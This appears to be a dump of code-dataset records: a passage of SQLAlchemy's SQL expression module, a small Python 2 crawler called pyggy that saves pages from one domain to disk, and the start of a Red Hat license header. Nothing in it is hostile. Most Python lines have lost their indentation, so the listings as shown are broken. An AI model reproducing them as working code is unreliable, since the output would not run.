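    # Hedged usage sketch, assuming ``users`` is a table construct defined elsewhere:
    #
    #     total = select([func.count(users.c.id)]).as_scalar()
    #     stmt = select([users.c.name, total])   # inner SELECT renders as a scalar subquery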
@_generative
def apply_labels(self):
"""return a new selectable with the 'use_labels' flag set to True.
This will result in column expressions being generated using labels
against their table name, such as "SELECT somecolumn AS
tablename_somecolumn". This allows selectables which contain multiple
FROM clauses to produce a unique set of column names regardless of
name conflicts among the individual FROM clauses.
"""
self.use_labels = True
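    # For illustration, assuming ``users`` and ``addresses`` table constructs that
    # both define an ``id`` column:
    #
    #     stmt = select([users, addresses]).apply_labels()
    #     # columns render roughly as "users.id AS users_id, addresses.id AS addresses_id, ..."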
def label(self, name):
"""return a 'scalar' representation of this selectable, embedded as a
subquery with a label.
See also ``as_scalar()``.
"""
return self.as_scalar().label(name)
@_generative
@util.deprecated(message="autocommit() is deprecated. "
"Use .execution_options(autocommit=True)")
def autocommit(self):
"""return a new selectable with the 'autocommit' flag set to True."""
self._execution_options = self._execution_options.union({'autocommit':True})
def _generate(self):
"""Override the default _generate() method to also clear out exported collections."""
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
s._reset_exported()
return s
@_generative
def limit(self, limit):
"""return a new selectable with the given LIMIT criterion applied."""
self._limit = limit
@_generative
def offset(self, offset):
"""return a new selectable with the given OFFSET criterion applied."""
self._offset = offset
@_generative
    def order_by(self, *clauses):
        """return a new selectable with the given list of ORDER BY criteria applied.
The criterion will be appended to any pre-existing ORDER BY criterion.
"""
self.append_order_by(*clauses)
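    # Illustrative chaining, assuming a ``users`` table construct; each call returns
    # a new select() and appends to any ORDER BY criteria already present:
    #
    #     stmt = select([users]).order_by(users.c.name)
    #     stmt = stmt.order_by(users.c.id)    # ORDER BY users.name, users.id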
@_generative
    def group_by(self, *clauses):
        """return a new selectable with the given list of GROUP BY criteria applied.
The criterion will be appended to any pre-existing GROUP BY criterion.
"""
self.append_group_by(*clauses)
    def append_order_by(self, *clauses):
        """Append the given ORDER BY criteria to this selectable.
The criterion will be appended to any pre-existing ORDER BY criterion.
"""
if len(clauses) == 1 and clauses[0] is None:
self._order_by_clause = ClauseList()
else:
if getattr(self, '_order_by_clause', None) is not None:
clauses = list(self._order_by_clause) + list(clauses)
self._order_by_clause = ClauseList(*clauses)
    def append_group_by(self, *clauses):
        """Append the given GROUP BY criteria to this selectable.
The criterion will be appended to any pre-existing GROUP BY criterion.
"""
if len(clauses) == 1 and clauses[0] is None:
self._group_by_clause = ClauseList()
else:
if getattr(self, '_group_by_clause', None) is not None:
clauses = list(self._group_by_clause) + list(clauses)
self._group_by_clause = ClauseList(*clauses)
@property
def _from_objects(self):
return [self]
class _ScalarSelect(_Grouping):
_from_objects = []
def __init__(self, element):
self.element = element
cols = list(element.c)
self.type = cols[0].type
@property
def columns(self):
raise exc.InvalidRequestError("Scalar Select expression has no columns; "
"use this object directly within a column-level expression.")
c = columns
def self_group(self, **kwargs):
return self
def _make_proxy(self, selectable, name):
return list(self.inner_columns)[0]._make_proxy(selectable, name)
class CompoundSelect(_SelectBaseMixin, FromClause):
"""Forms the basis of ``UNION``, ``UNION ALL``, and other
SELECT-based set operations."""
__visit_name__ = 'compound_select'
def __init__(self, keyword, *selects, **kwargs):
self._should_correlate = kwargs.pop('correlate', False)
self.keyword = keyword
self.selects = []
numcols = None
# some DBs do not like ORDER BY in the inner queries of a UNION, etc.
for n, s in enumerate(selects):
s = _clause_element_as_expr(s)
if not numcols:
numcols = len(s.c)
elif len(s.c) != numcols:
raise exc.ArgumentError(
"All selectables passed to CompoundSelect must "
"have identical numbers of columns; select #%d has %d columns,"
" select #%d has %d" %
(1, len(self.selects[0].c), n+1, len(s.c))
)
self.selects.append(s.self_group(self))
_SelectBaseMixin.__init__(self, **kwargs)
def self_group(self, against=None):
return _FromGrouping(self)
def is_derived_from(self, fromclause):
for s in self.selects:
if s.is_derived_from(fromclause):
return True
return False
def _populate_column_collection(self):
for cols in zip(*[s.c for s in self.selects]):
# this is a slightly hacky thing - the union exports a column that
# resembles just that of the *first* selectable. to get at a "composite" column,
# particularly foreign keys, you have to dig through the proxies collection
# which we generate below. We may want to improve upon this,
# such as perhaps _make_proxy can accept a list of other columns that
# are "shared" - schema.column can then copy all the ForeignKeys in.
# this would allow the union() to have all those fks too.
proxy = cols[0]._make_proxy(
self, name=self.use_labels and cols[0]._label or None)
# hand-construct the "proxies" collection to include all derived columns
# place a 'weight' annotation corresponding to how low in the list of
# select()s the column occurs, so that the corresponding_column() operation
# can resolve conflicts
proxy.proxies = [c._annotate({'weight':i + 1}) for i, c in enumerate(cols)]
def _copy_internals(self, clone=_clone):
self._reset_exported()
self.selects = [clone(s) for s in self.selects]
if hasattr(self, '_col_map'):
del self._col_map
for attr in ('_order_by_clause', '_group_by_clause'):
if getattr(self, attr) is not None:
setattr(self, attr, clone(getattr(self, attr)))
def get_children(self, column_collections=True, **kwargs):
return (column_collections and list(self.c) or []) + \
[self._order_by_clause, self._group_by_clause] + list(self.selects)
def bind(self):
if self._bind:
return self._bind
for s in self.selects:
e = s.bind
if e:
return e
else:
return None
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
class Select(_SelectBaseMixin, FromClause):
"""Represents a ``SELECT`` statement.
Select statements support appendable clauses, as well as the
ability to execute themselves and return a result set.
"""
__visit_name__ = 'select'
_prefixes = ()
def __init__(self,
columns,
whereclause=None,
from_obj=None,
distinct=False,
having=None,
correlate=True,
prefixes=None,
**kwargs):
"""Construct a Select object.
The public constructor for Select is the
:func:`select` function; see that function for
argument descriptions.
Additional generative and mutator methods are available on the
:class:`_SelectBaseMixin` superclass.
"""
self._should_correlate = correlate
self._distinct = distinct
self._correlate = set()
self._froms = util.OrderedSet()
try:
cols_present = bool(columns)
except TypeError:
raise exc.ArgumentError("columns argument to select() must "
"be a Python list or other iterable")
if cols_present:
self._raw_columns = []
for c in columns:
c = _literal_as_column(c)
if isinstance(c, _ScalarSelect):
c = c.self_group(against=operators.comma_op)
self._raw_columns.append(c)
self._froms.update(_from_objects(*self._raw_columns))
else:
self._raw_columns = []
if whereclause is not None:
self._whereclause = _literal_as_text(whereclause)
self._froms.update(_from_objects(self._whereclause))
else:
self._whereclause = None
if from_obj is not None:
for f in util.to_list(from_obj):
if _is_literal(f):
self._froms.add(_TextClause(f))
else:
self._froms.add(f)
if having is not None:
self._having = _literal_as_text(having)
else:
self._having = None
if prefixes:
self._prefixes = tuple([_literal_as_text(p) for p in prefixes])
_SelectBaseMixin.__init__(self, **kwargs)
def _get_display_froms(self, existing_froms=None):
"""Return the full list of 'from' clauses to be displayed.
Takes into account a set of existing froms which may be
rendered in the FROM clause of enclosing selects; this Select
may want to leave those absent if it is automatically
correlating.
"""
froms = self._froms
toremove = itertools.chain(*[f._hide_froms for f in froms])
if toremove:
froms = froms.difference(toremove)
if len(froms) > 1 or self._correlate:
if self._correlate:
froms = froms.difference(_cloned_intersection(froms, self._correlate))
if self._should_correlate and existing_froms:
froms = froms.difference(_cloned_intersection(froms, existing_froms))
if not len(froms):
raise exc.InvalidRequestError(
"Select statement '%s' returned no FROM clauses "
"due to auto-correlation; specify correlate(<tables>) "
"to control correlation manually." % self)
return froms
@property
def froms(self):
"""Return the displayed list of FromClause elements."""
return self._get_display_froms()
@property
def type(self):
raise exc.InvalidRequestError("Select objects don't have a type. "
"Call as_scalar() on this Select object "
"to return a 'scalar' version of this Select.")
@util.memoized_instancemethod
def locate_all_froms(self):
"""return a Set of all FromClause elements referenced by this Select.
This set is a superset of that returned by the ``froms`` property, which
is specifically for those FromClause elements that would actually be rendered.
"""
return self._froms.union(_from_objects(*list(self._froms)))
@property
def inner_columns(self):
"""an iterator of all ColumnElement expressions which would
be rendered into the columns clause of the resulting SELECT statement.
"""
return _select_iterables(self._raw_columns)
def is_derived_from(self, fromclause):
if self in fromclause._cloned_set:
return True
for f in self.locate_all_froms():
if f.is_derived_from(fromclause):
return True
return False
def _copy_internals(self, clone=_clone):
self._reset_exported()
from_cloned = dict((f, clone(f))
for f in self._froms.union(self._correlate))
self._froms = util.OrderedSet(from_cloned[f] for f in self._froms)
self._correlate = set(from_cloned[f] for f in self._correlate)
self._raw_columns = [clone(c) for c in self._raw_columns]
for attr in ('_whereclause', '_having', '_order_by_clause', '_group_by_clause'):
if getattr(self, attr) is not None:
setattr(self, attr, clone(getattr(self, attr)))
def get_children(self, column_collections=True, **kwargs):
"""return child elements as per the ClauseElement specification."""
return (column_collections and list(self.columns) or []) + \
self._raw_columns + list(self._froms) + \
[x for x in
(self._whereclause, self._having,
self._order_by_clause, self._group_by_clause)
if x is not None]
@_generative
def column(self, column):
"""return a new select() construct with the given column expression
added to its columns clause.
"""
column = _literal_as_column(column)
if isinstance(column, _ScalarSelect):
column = column.self_group(against=operators.comma_op)
self._raw_columns = self._raw_columns + [column]
self._froms = self._froms.union(_from_objects(column))
@_generative
def with_only_columns(self, columns):
"""return a new select() construct with its columns clause replaced
with the given columns.
"""
self._raw_columns = [
isinstance(c, _ScalarSelect) and
c.self_group(against=operators.comma_op) or c
for c in [_literal_as_column(c) for c in columns]
]
@_generative
def where(self, whereclause):
"""return a new select() construct with the given expression added to its
WHERE clause, joined to the existing clause via AND, if any.
"""
self.append_whereclause(whereclause)
@_generative
def having(self, having):
"""return a new select() construct with the given expression added to its HAVING
clause, joined to the existing clause via AND, if any.
"""
self.append_having(having)
@_generative
def distinct(self):
"""return a new select() construct which will apply DISTINCT to its columns
clause.
"""
self._distinct = True
@_generative
def prefix_with(self, clause):
"""return a new select() construct which will apply the given expression to the
start of its columns clause, not using any commas.
"""
clause = _literal_as_text(clause)
self._prefixes = self._prefixes + (clause,)
@_generative
def select_from(self, fromclause):
"""return a new select() construct with the given FROM expression applied to its
list of FROM objects.
"""
fromclause = _literal_as_text(fromclause)
self._froms = self._froms.union([fromclause])
@_generative
def correlate(self, *fromclauses):
"""return a new select() construct which will correlate the given FROM clauses to
that of an enclosing select(), if a match is found.
By "match", the given fromclause must be present in this select's list of FROM
objects and also present in an enclosing select's list of FROM objects.
Calling this method turns off the select's default behavior of
"auto-correlation". Normally, select() auto-correlates all of its FROM clauses to
those of an embedded select when compiled.
If the fromclause is None, correlation is disabled for the returned select().
"""
self._should_correlate = False
if fromclauses == (None,):
self._correlate = set()
else:
self._correlate = self._correlate.union(fromclauses)
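    # A sketch of the correlation behavior described above, assuming ``users``
    # and ``addresses`` table constructs:
    #
    #     inner = select([func.count(addresses.c.id)]).where(addresses.c.user_id == users.c.id)
    #     stmt = select([users.c.name, inner.as_scalar()])
    #     # by default ``users`` is auto-correlated out of the inner FROM list when the
    #     # subquery is compiled inside ``stmt``; inner.correlate(None) disables that.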
def append_correlation(self, fromclause):
"""append the given correlation expression to this select() construct."""
self._should_correlate = False
self._correlate = self._correlate.union([fromclause])
def append_column(self, column):
"""append the given column expression to the columns clause of this select()
construct.
"""
column = _literal_as_column(column)
if isinstance(column, _ScalarSelect):
column = column.self_group(against=operators.comma_op)
self._raw_columns = self._raw_columns + [column]
self._froms = self._froms.union(_from_objects(column))
self._reset_exported()
def append_prefix(self, clause):
"""append the given columns clause prefix expression to this select()
construct.
"""
clause = _literal_as_text(clause)
self._prefixes = self._prefixes + (clause,)
def append_whereclause(self, whereclause):
"""append the given expression to this select() construct's WHERE criterion.
The expression will be joined to existing WHERE criterion via AND.
"""
whereclause = _literal_as_text(whereclause)
self._froms = self._froms.union(_from_objects(whereclause))
if self._whereclause is not None:
self._whereclause = and_(self._whereclause, whereclause)
else:
self._whereclause = whereclause
def append_having(self, having):
"""append the given expression to this select() construct's HAVING criterion.
The expression will be joined to existing HAVING criterion via AND.
"""
if self._having is not None:
self._having = and_(self._having, _literal_as_text(having))
else:
self._having = _literal_as_text(having)
def append_from(self, fromclause):
"""append the given FromClause expression to this select() construct's FROM
clause.
"""
if _is_literal(fromclause):
fromclause = _TextClause(fromclause)
self._froms = self._froms.union([fromclause])
def __exportable_columns(self):
for column in self._raw_columns:
if isinstance(column, Selectable):
for co in column.columns:
yield co
elif isinstance(column, ColumnElement):
yield column
else:
continue
def _populate_column_collection(self):
for c in self.__exportable_columns():
c._make_proxy(self, name=self.use_labels and c._label or None)
def self_group(self, against=None):
"""return a 'grouping' construct as per the ClauseElement specification.
This produces an element that can be embedded in an expression. Note that
this method is called automatically as needed when constructing expressions.
"""
if isinstance(against, CompoundSelect):
return self
return _FromGrouping(self)
def union(self, other, **kwargs):
"""return a SQL UNION of this select() construct against the given selectable."""
return union(self, other, **kwargs)
def union_all(self, other, **kwargs):
"""return a SQL UNION ALL of this select() construct against the given
selectable.
"""
return union_all(self, other, **kwargs)
def except_(self, other, **kwargs):
"""return a SQL EXCEPT of this select() construct against the given selectable."""
return except_(self, other, **kwargs)
def except_all(self, other, **kwargs):
"""return a SQL EXCEPT ALL of this select() construct against the given
selectable.
"""
return except_all(self, other, **kwargs)
def intersect(self, other, **kwargs):
"""return a SQL INTERSECT of this select() construct against the given
selectable.
"""
return intersect(self, other, **kwargs)
def intersect_all(self, other, **kwargs):
"""return a SQL INTERSECT ALL of this select() construct against the given
selectable.
"""
return intersect_all(self, other, **kwargs)
def bind(self):
if self._bind:
return self._bind
if not self._froms:
for c in self._raw_columns:
e = c.bind
if e:
self._bind = e
return e
else:
e = list(self._froms)[0].bind
if e:
self._bind = e
return e
return None
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
class _UpdateBase(Executable, ClauseElement):
"""Form the base for ``INSERT``, ``UPDATE``, and ``DELETE`` statements."""
__visit_name__ = 'update_base'
_execution_options = Executable._execution_options.union({'autocommit':True})
kwargs = util.frozendict()
def _process_colparams(self, parameters):
if isinstance(parameters, (list, tuple)):
pp = {}
for i, c in enumerate(self.table.c):
pp[c.key] = parameters[i]
return pp
else:
return parameters
def params(self, *arg, **kw):
raise NotImplementedError(
"params() is not supported for INSERT/UPDATE/DELETE statements."
" To set the values for an INSERT or UPDATE statement, use"
" stmt.values(**parameters).")
def bind(self):
return self._bind or self.table.bind
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
_returning_re = re.compile(r'(?:firebird|postgres(?:ql)?)_returning')
def _process_deprecated_kw(self, kwargs):
for k in list(kwargs):
m = self._returning_re.match(k)
if m:
self._returning = kwargs.pop(k)
util.warn_deprecated(
"The %r argument is deprecated. Please "
"use statement.returning(col1, col2, ...)" % k
)
return kwargs
@_generative
def returning(self, *cols):
"""Add a RETURNING or equivalent clause to this statement.
The given list of columns represent columns within the table
that is the target of the INSERT, UPDATE, or DELETE. Each
element can be any column expression. :class:`~sqlalchemy.schema.Table` objects
will be expanded into their individual columns.
Upon compilation, a RETURNING clause, or database equivalent,
will be rendered within the statement. For INSERT and UPDATE,
the values are the newly inserted/updated values. For DELETE,
the values are those of the rows which were deleted.
Upon execution, the values of the columns to be returned
are made available via the result set and can be iterated
using ``fetchone()`` and similar. For DBAPIs which do not
        natively support returning values (e.g. cx_oracle),
SQLAlchemy will approximate this behavior at the result level
so that a reasonable amount of behavioral neutrality is
provided.
Note that not all databases/DBAPIs
support RETURNING. For those backends with no support,
an exception is raised upon compilation and/or execution.
For those who do support it, the functionality across backends
varies greatly, including restrictions on executemany()
and other statements which return multiple rows. Please
read the documentation notes for the database in use in
order to determine the availability of RETURNING.
"""
self._returning = cols
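    # Hedged illustration of the RETURNING usage described above, assuming a
    # ``users`` Table and a backend with native RETURNING support:
    #
    #     stmt = users.insert().values(name='ed').returning(users.c.id)
    #     # executing ``stmt`` yields a result whose fetchone() carries the new id.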
class _ValuesBase(_UpdateBase):
__visit_name__ = 'values_base'
def __init__(self, table, values):
self.table = table
self.parameters = self._process_colparams(values)
@_generative
def values(self, *args, **kwargs):
"""specify the VALUES clause for an INSERT statement, or the SET clause for an
UPDATE.
\**kwargs
key=<somevalue> arguments
\*args
A single dictionary can be sent as the first positional argument. This
allows non-string based keys, such as Column objects, to be used.
"""
if args:
v = args[0]
else:
v = {}
if self.parameters is None:
self.parameters = self._process_colparams(v)
self.parameters.update(kwargs)
else:
self.parameters = self.parameters.copy()
self.parameters.update(self._process_colparams(v))
self.parameters.update(kwargs)
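    # Sketch of the two argument forms described above, assuming a ``users`` table:
    #
    #     users.update().values(name='ed')                 # keyword form
    #     users.update().values({users.c.name: 'ed'})      # dictionary form, Column keys allowed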
class Insert(_ValuesBase):
"""Represent an INSERT construct.
The :class:`Insert` object is created using the :func:`insert()` function.
"""
__visit_name__ = 'insert'
_prefixes = ()
def __init__(self,
table,
values=None,
inline=False,
bind=None,
prefixes=None,
returning=None,
**kwargs):
_ValuesBase.__init__(self, table, values)
self._bind = bind
self.select = None
self.inline = inline
self._returning = returning
if prefixes:
self._prefixes = tuple([_literal_as_text(p) for p in prefixes])
if kwargs:
self.kwargs = self._process_deprecated_kw(kwargs)
def get_children(self, **kwargs):
if self.select is not None:
return self.select,
else:
return ()
def _copy_internals(self, clone=_clone):
# TODO: coverage
self.parameters = self.parameters.copy()
@_generative
def prefix_with(self, clause):
"""Add a word or expression between INSERT and INTO. Generative.
If multiple prefixes are supplied, they will be separated with
spaces.
"""
clause = _literal_as_text(clause)
self._prefixes = self._prefixes + (clause,)
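    # For example (a backend-specific prefix is assumed here):
    #
    #     users.insert().prefix_with("OR IGNORE")
    #     # renders roughly as "INSERT OR IGNORE INTO users ..." where supported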
class Update(_ValuesBase):
"""Represent an Update construct.
The :class:`Update` object is created using the :func:`update()` function.
"""
__visit_name__ = 'update'
def __init__(self,
table,
whereclause,
values=None,
inline=False,
bind=None,
returning=None,
**kwargs):
_ValuesBase.__init__(self, table, values)
self._bind = bind
self._returning = returning
if whereclause is not None:
self._whereclause = _literal_as_text(whereclause)
else:
self._whereclause = None
self.inline = inline
if kwargs:
self.kwargs = self._process_deprecated_kw(kwargs)
def get_children(self, **kwargs):
if self._whereclause is not None:
return self._whereclause,
else:
return ()
def _copy_internals(self, clone=_clone):
# TODO: coverage
self._whereclause = clone(self._whereclause)
self.parameters = self.parameters.copy()
@_generative
def where(self, whereclause):
"""return a new update() construct with the given expression added to its WHERE
clause, joined to the existing clause via AND, if any.
"""
if self._whereclause is not None:
self._whereclause = and_(self._whereclause, _literal_as_text(whereclause))
else:
self._whereclause = _literal_as_text(whereclause)
class Delete(_UpdateBase):
"""Represent a DELETE construct.
The :class:`Delete` object is created using the :func:`delete()` function.
"""
__visit_name__ = 'delete'
def __init__(self,
table,
whereclause,
bind=None,
                 returning=None,
**kwargs):
self._bind = bind
self.table = table
self._returning = returning
if whereclause is not None:
self._whereclause = _literal_as_text(whereclause)
else:
self._whereclause = None
if kwargs:
self.kwargs = self._process_deprecated_kw(kwargs)
def get_children(self, **kwargs):
if self._whereclause is not None:
return self._whereclause,
else:
return ()
@_generative
def where(self, whereclause):
"""Add the given WHERE clause to a newly returned delete construct."""
if self._whereclause is not None:
self._whereclause = and_(self._whereclause, _literal_as_text(whereclause))
else:
self._whereclause = _literal_as_text(whereclause)
def _copy_internals(self, clone=_clone):
# TODO: coverage
self._whereclause = clone(self._whereclause)
class _IdentifiedClause(Executable, ClauseElement):
__visit_name__ = 'identified'
_execution_options = Executable._execution_options.union({'autocommit':False})
quote = None
def __init__(self, ident):
self.ident = ident
class SavepointClause(_IdentifiedClause):
__visit_name__ = 'savepoint'
class RollbackToSavepointClause(_IdentifiedClause):
__visit_name__ = 'rollback_to_savepoint'
class ReleaseSavepointClause(_IdentifiedClause):
__visit_name__ = 'release_savepoint'
|
obeattie/sqlalchemy
|
lib/sqlalchemy/sql/expression.py
|
Python
|
mit
| 141,178
|
[
"VisIt"
] |
670312249027d556036f315056158b277b97c7a38546fee8470669531adc42cf
|
# Pyggy
#
# Author: Anton Samson <anton@antonsamson.com>
# Available freely at: https://github.com/antsam/pyggy
#
# A web crawler that will save all the pages/files from a specific
# domain/subdomain onto disk.
#
# To start with default settings: python pyggy.py -v
# The -v flag will turn on verbose output so you can see what the
# crawler is currently doing.
#
# Currently does not deep-crawl dynamic pages,
# e.g. URLs containing ?variable=something
#
# The crawler will save its visited and seed URLs every N page visits.
#
# TODO: Add multi-threading
# TODO: Add support for user authentication/login pages
# TODO: Ignore non HTTP links
#
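# Example invocations (illustrative only; every flag shown has a default and is
# defined in the argparse setup further down):
#
#   python pyggy.py -v -f https://www.github.com/antsam -b github.com/antsam/ -d ./data/
#   python pyggy.py -v -r    # resume a crawl from the saved seed/visited lists
#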
import sys
import argparse
import hashlib
import os
from time import sleep
from random import randint
import lxml.html.clean
from urlparse import urlparse
import requests
args = []
# Constants
CONST_HEADERS = {"User-Agent": "Pyggy 0.1 - https://github.com/antsam/pyggy"}
CONST_HTTP = "http://"
CONST_HTTPS = "https://"
CONST_RESUME_FILE_NAME = "resume.dat"
CONST_VISITED_FILE_NAME = "visited.dat"
CONST_DEFAULT_FRONTIER = "https://github.com/antsam/"
CONST_DEFAULT_BASE = "github.com/antsam/"
CONST_DEFAULT_SAVE_PATH = "./data/"
CONST_DEFAULT_SAVE_INTERVAL = int(5)
CONST_DEFAULT_FILE_NAME = "index.html"
CONST_DEFAULT_MIN_WAIT = int(10)
CONST_DEFAULT_MAX_WAIT = int(15)
CONST_DEFAULT_TIMEOUT = int(10)
# Shared variables
_visited = set()
_seeds = set()
# Make a thread sleep
def throttle(lower, upper):
wait = randint(lower, upper)
    if args.verbose:
print "Sleeping for " + str(wait) + " seconds"
sleep(wait)
# Is this document parsable?
def is_text(header):
return header.startswith("text/")
# Get the SHA1 checksum of a file
def file_checksum(fp, block_size = 2**20):
sha1 = hashlib.sha1()
while True:
data = fp.read(block_size)
if not data:
break
sha1.update(data)
return sha1.hexdigest()
# Get the SHA1 hash of a String
def checksum(text):
return hashlib.sha1(text).hexdigest()
# Calculate sha1 of URL
def get_url_hash(url):
return hashlib.sha1(url.lower()).hexdigest()
# Determines a suitable save directory for a given URL
def get_save_dir(url, skip = 1):
parsed = urlparse(url)
dir_path = parsed.path.split("/")
if len(dir_path) >= 2:
dir_path = args.dir + parsed.netloc + "/".join(dir_path[:(-1 * skip)]) + "/"
else:
dir_path = args.dir + parsed.netloc + "/"
return dir_path.replace("//", "/")
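# For example: with args.dir == "./data/", the URL
# "http://github.com/antsam/pyggy/index.html" maps to "./data/github.com/antsam/pyggy/".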
# Choose an appropriate filename
# May not always have a file extension
def get_file_name(url, skip = 1):
parsed = urlparse(url)
file_name = parsed.path.split("/")
if (len(file_name) >= 2) and file_name[-1 * skip]:
return file_name[-1 * skip]
return None
# Has the URL been _visited before?
def been_visited(url):
hashed = get_url_hash(url)
if hashed in _visited:
if args.verbose:
print "This URL has already been _visited: " + url
return True
_visited.add(hashed)
return False
# Visit a URL and save it to disk
# Print URL before showing error
def visit(url, base):
if been_visited(url):
return
try:
req = requests.get(url, stream=True, headers=CONST_HEADERS, timeout=args.timeout)
    except Exception:
print "Error: Could not retrieve URL: " + url
return
final_url = url
if len(req.history) > 0:
final_url = normalize_url(req.url)
if been_visited(final_url):
return
save_dir = get_save_dir(final_url)
if req.status_code == 200:
raw_data = req.content
can_parse = is_text(req.headers["content-type"])
if can_parse:
if args.verbose:
print "URL appears to contain text content."
if args.clean:
cleaned = lxml.html.clean.clean_html(raw_data)
elif args.verbose:
print "URL data does not appear to contain text content."
file_name = get_file_name(final_url)
if (not file_name) and can_parse:
file_name = CONST_DEFAULT_FILE_NAME
elif not file_name:
save_dir = get_save_dir(final_url, 2)
file_name = get_file_name(final_url, 2)
file_path = save_dir + file_name
if args.verbose:
print "Starting URL: " + url
print "Final URL: " + final_url
print "Save directory: " + save_dir
print "File name: " + file_name
if not os.path.exists(save_dir):
try:
os.makedirs(save_dir)
            except OSError:
print "Error: Received malformed URL."
return
if os.path.isfile(file_path):
# do checksums
fh = open(file_path, "r+")
local_checksum = file_checksum(fh)
# TODO: Simplify first two conditions
            if args.clean and can_parse and (checksum(cleaned) == local_checksum) and args.verbose:
print "Page content has not changed."
cleaned = None
elif (checksum(raw_data) == local_checksum) and args.verbose:
print "Page content has not changed."
else:
# Overwrite old data
if args.verbose:
print "Page content has changed since last visit."
fh.seek(0)
if args.clean and can_parse:
fh.write(cleaned)
cleaned = None
else:
fh.write(raw_data)
fh.truncate()
fh.close()
else:
fh = open(file_path, "w")
if can_parse and args.clean:
fh.write(cleaned)
cleaned = None
else:
fh.write(raw_data)
fh.close()
if can_parse:
get_links(url, base, raw_data)
raw_data = None
else:
print "Warning: Received HTTP status code: " + str(req.status_code)
return
# Normalizes URLs
def normalize_url(url):
parsed = urlparse(url)
url_base = parsed.netloc
url_path = parsed.path
if ("." not in url_path) and ((not url_path) or parsed.fragment):
url_path += "/"
url_path = url_path.replace("//", "/")
return parsed.scheme + "://" + url_base + url_path
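# For example: "http://github.com" normalizes to "http://github.com/", and
# "http://github.com/antsam#readme" drops the fragment and becomes
# "http://github.com/antsam/".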
def in_domain(url, domain):
parsed = urlparse(url)
return ((parsed.scheme in CONST_HTTPS) and (domain.netloc in parsed.netloc) and (domain.path in parsed.path))
# Query for links
def query_links(query, domain):
links = [normalize_url(link) for link in query if in_domain(link, domain)]
return links
# Parse HTML for links
def get_links(url, base, html):
try:
dom = lxml.html.fromstring(html, base_url=CONST_HTTP+base)
    except Exception:
print "Error: Could not parse file!"
return
dom.make_links_absolute(url)
domain = urlparse(CONST_HTTP + base)
# TODO: Make this shorter
links = query_links(dom.xpath("//a/@href"), domain) + query_links(dom.xpath("//frame/@src"), domain) + query_links(dom.xpath("//iframe/@src"), domain)
if args.verbose:
print "Newly found links: " + str(len(links))
dom = None
for link in links:
        if get_url_hash(link) not in _visited:
_seeds.add(str(link))
# Load a set from disk
def load_set(name):
if os.path.isfile(args.dir + name):
fh = open(args.dir + name, "r")
resume_data = {normalize_url(line.rstrip()) for line in fh.readlines()}
fh.close()
return resume_data
resume_data = set()
return resume_data
# Save a set to disk
def save_set(name, data):
if not os.path.isfile(args.dir + name):
if not os.path.exists(args.dir):
os.makedirs(args.dir)
fh = open(args.dir + name, "w")
else:
fh = open(args.dir + name, "r+")
fh.seek(0)
for line in data:
fh.write("%s\n" % line)
fh.truncate()
fh.close()
def verify_args():
args.frontier = normalize_url(args.frontier)
if args.dir[-1] != "/":
args.dir += "/"
if not isinstance(args.max, (int, long)) or (args.max <= 0):
args.max = CONST_DEFAULT_MAX_WAIT
if not isinstance(args.min, (int, long)) or (args.min <= 0):
args.min = CONST_DEFAULT_MIN_WAIT
if args.min >= args.max:
args.min = CONST_DEFAULT_MIN_WAIT
args.max = CONST_DEFAULT_MAX_WAIT
if not isinstance(args.interval, (int, long)) or (args.interval <= 0):
args.interval = CONST_DEFAULT_SAVE_INTERVAL
if not isinstance(args.timeout, (int, long)) or (args.timeout <= 0):
args.timeout = CONST_DEFAULT_TIMEOUT
def test():
return
# Main
if __name__ == "__main__":
# Parse any command line args
parser = argparse.ArgumentParser(description="Crawls a domain and downloads copies of each URL _visited.")
parser.add_argument("-b", "--base", help="sets the absolute base for a URL, e.g. www.github.com/", default=CONST_DEFAULT_BASE)
parser.add_argument("-d", "--dir", help="sets the location of where to save crawl data", default=CONST_DEFAULT_SAVE_PATH)
parser.add_argument("-f", "--frontier", help="sets the crawl frontier, e.g. https://www.github.com/antsam", default=CONST_DEFAULT_FRONTIER)
parser.add_argument("-i", "--interval", help="sets the save interval for the URL seed and _visited list", type=int, default=CONST_DEFAULT_SAVE_INTERVAL)
parser.add_argument("-m", "--min", help="sets the minimum wait time in seconds before each crawl", type=int, default=CONST_DEFAULT_MIN_WAIT)
parser.add_argument("-x", "--max", help="sets the maximum wait time in seconds before each crawl", type=int, default=CONST_DEFAULT_MAX_WAIT)
parser.add_argument("-w", "--timeout", help="sets the maximum time to wait in seconds for a URL to load", type=int, default=CONST_DEFAULT_TIMEOUT)
parser.add_argument("-r", "--resume", help="resumes crawling from where we last left off", action="store_true")
parser.add_argument("-v", "--verbose", help="enables verbose output", action="store_true")
parser.add_argument("-c", "--clean", help="HTML data will be cleaned before saving", action="store_true")
args, unknown = parser.parse_known_args()
# Normalize user input
# check that none of the args are invalid, e.g. timeouts and data dirs
verify_args()
if args.verbose:
print args
print unknown
print "Crawler has started!"
print "Frontier: " + args.frontier
print "Base URL: " + args.base
# Populate _seeds
if args.resume:
# Load _seeds and _visited from disk
        if args.verbose:
print "Loading seed URLs from disk."
_seeds.update(load_set(CONST_RESUME_FILE_NAME))
_visited.update(load_set(CONST_VISITED_FILE_NAME))
if len(_seeds) > 0:
domain = urlparse(CONST_HTTP + args.base)
seed = _seeds.pop()
if not in_domain(seed, domain):
print seed
sys.exit("Fatal Error: URL does not belong to the current site! Resumed from wrong site data?")
visit(seed, args.base)
else:
print "Error: Could not load seed URLs from disk. Defaulting to frontier."
visit(args.frontier, args.base)
else:
if args.verbose:
print "Collecting seed URLs from the frontier!"
visit(args.frontier, args.base)
throttle(args.min, args.max)
crawled = 0
while len(_seeds) > 0:
print "Current number of seeds: " + str(len(_seeds))
visit(_seeds.pop(), args.base)
crawled += 1
throttle(args.min, args.max)
if crawled % args.interval == 0:
if args.verbose:
print "Saving seed URLs to disk."
save_set(CONST_RESUME_FILE_NAME, _seeds)
if args.verbose:
print "Saving visited URLs to disk."
save_set(CONST_VISITED_FILE_NAME, _visited)
print "Crawler has finished!"
|
antsam/pyggy
|
pyggy.py
|
Python
|
agpl-3.0
| 11,949
|
[
"VisIt"
] |
1acff71040f45fd8b17d542fc3cbf9c55d75a4ed7770ae8d55fbc8775b6c01f1
|
# Storage filtering classes
#
# Copyright (C) 2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
